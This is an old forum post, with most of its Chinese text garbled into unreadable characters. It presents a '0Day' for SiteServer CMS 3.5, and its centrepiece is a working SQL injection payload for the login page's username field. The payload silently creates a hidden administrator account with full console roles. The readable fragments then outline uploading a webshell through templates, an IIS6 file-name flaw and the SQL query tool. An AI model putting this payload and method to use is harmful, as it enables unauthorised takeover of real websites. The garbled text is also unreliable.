admin 2013-1-11 21:10:58

SiteServer CMS 0Day

ɱµ3.5

stieserver:www.siteserver.cn



EXP:

ֱӷUserCenter/login.aspx



û룺

123'insert into bairong_Administrator(,,,) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--



Ϊգ֤ύȿݿвһûΪblueΪlanhaiijû



֮ٷʺ̨SiteServer/login.aspxòû½



̨webshellַ

һ

վ-ʾ-ģ-ӵҳģ-ֱaspx



ԱȨ-û-ûΪ1.asp

http://127.0.0.1/usercenter/

øղӵ1.aspȥ½ȥ֮ϴͷIIS6©webshell

ps̨ûʱ֤ǷзǷַ



ϵͳ-ʵù-鿴
Կݿ͡ƣWEB·

ϵͳ-ݿ⹤-SQLѯ
⹦IJֱӾ൱һѯʲôԶУbackupwebshellsqlserveròֱXXOO

ҳ: [1]
鿴汾: SiteServer CMS 0Day